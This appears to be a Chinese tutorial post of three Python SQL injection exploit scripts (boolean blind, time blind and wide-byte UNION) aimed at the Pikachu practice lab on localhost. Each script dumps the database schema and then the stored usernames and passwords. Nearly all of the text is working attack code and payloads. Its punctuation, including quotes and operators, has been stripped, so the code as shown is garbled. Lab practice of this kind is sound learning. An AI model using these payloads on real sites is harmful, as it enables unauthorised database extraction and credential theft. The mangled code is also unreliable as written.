1.盲注(base on boolian)import requests import time #盲注(boolian) # 配置100%匹配你的原理 url http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_b.php base_params { name: , submit: 查询 } TRUE_TEXT your uid # 真 FALSE_TEXT username不存在 # 假 # def bool_check(payload): 发送payload返回True真False假 params base_params.copy() params[name] payload try: res requests.get(url, paramsparams, timeout3) if TRUE_TEXT in res.text and FALSE_TEXT not in res.text: return True return False except: return False def get_length(sql): 猜解长度 for l in range(1, 50): payload fkobe and length(({sql})){l}# if bool_check(payload): return l return 0 def get_content(sql): 逐字符猜解内容 length get_length(sql) result for i in range(1, length 1): for ascii_code in range(32, 127): char chr(ascii_code) payload fkobe and ascii(substr(({sql}),{i},1)){ascii_code}# if bool_check(payload): result char print(f\r[] 已获取{result}, end) break return result # 开始脱库 print( * 60) print( PIKACHU 布尔盲注 ) print( * 60) print(\n[1] 数据库名, end) db_name get_content(select database()) print(f {db_name}) print(\n[2] 所有表名, end) tables get_content(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) print(f {tables}) print(\n[3] member 字段, end) cols get_content(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namemember) print(f {cols}) print(\n[4] 账号密码, end) data get_content(select group_concat(username,:,pw) from member) print(f {data}) print(\n✅ 脱库完成)2.盲注(base on time)import requests import time # 【必须是时间盲注页面】 url http://127.0.0.1/pikachu-master/vul/sqli/sqli_blind_t.php base_params { name: , submit: 查询 } SLEEP 2 # def time_check(payload): params base_params.copy() params[name] payload start time.time() try: requests.get(url, paramsparams, timeout5) except: pass end time.time() return end - start SLEEP def get_length(sql): for l in range(1, 50): payload fkobe and if(length(({sql})){l}, sleep({SLEEP}), 1)# if time_check(payload): return l return 0 def get_content(sql): length get_length(sql) result for i in range(1, length 1): for asc in range(32, 127): payload fkobe and if(ascii(substr(({sql}),{i},1)){asc}, sleep({SLEEP}), 1)# if time_check(payload): result chr(asc) print(f\r[] 已获取{result}, end) break return result # 开始 print( * 60) print( PIKACHU 时间盲注 ) print( * 60) print(\n数据库名, end) db get_content(select database()) print(f {db}) print(\n表名, end) tables get_content(select group_concat(table_name) from information_schema.tables where table_schemadatabase()) print(f {tables}) print(\n字段, end) cols get_content(select group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_namemember) print(f {cols}) print(\n账号密码, end) data get_content(select group_concat(username,:,pw) from member) print(f {data}) print(\n✅ 脱库完成)3.宽字节注入import requests target http://127.0.0.1/pikachu-master/vul/sqli/sqli_widebyte.php headers { Content-Type: application/x-www-form-urlencoded } def exp(payload): post_data payload.encode() res requests.post(target, datapost_data, headersheaders).text if your uid: in res: uid res.split(your uid:)[1].split(br /)[0].strip() email res.split(your email is:)[1].split(/p)[0].strip() return uid, email return None, None if __name__ __main__: print( Pikachu 宽字节注入 全套EXP \n) # 1. 查询库名 版本 u1,e1 exp(name1%df union select database(),version() #submit%E6%9F%A5%E8%AF%A2) print(f[1] 当前数据库{u1}) print(f[2] MySQL版本{e1}\n) # 2. 查询所有表名 u2,e2 exp(name1%df union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase() #submit%E6%9F%A5%E8%AF%A2) print(f[3] 全部数据表{e2}\n) # 3. ✅ 修复查询users表所有字段加反引号 u3,e3 exp(name1%df union select 1,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers #submit%E6%9F%A5%E8%AF%A2) print(f[4] users表字段{e3}\n) # 4. 爆账号密码 u4,e4 exp(name1%df union select username,password from users limit 0,1 #submit%E6%9F%A5%E8%AF%A2) print(f[5] 账号{u4}) print(f[6] 密码{e4})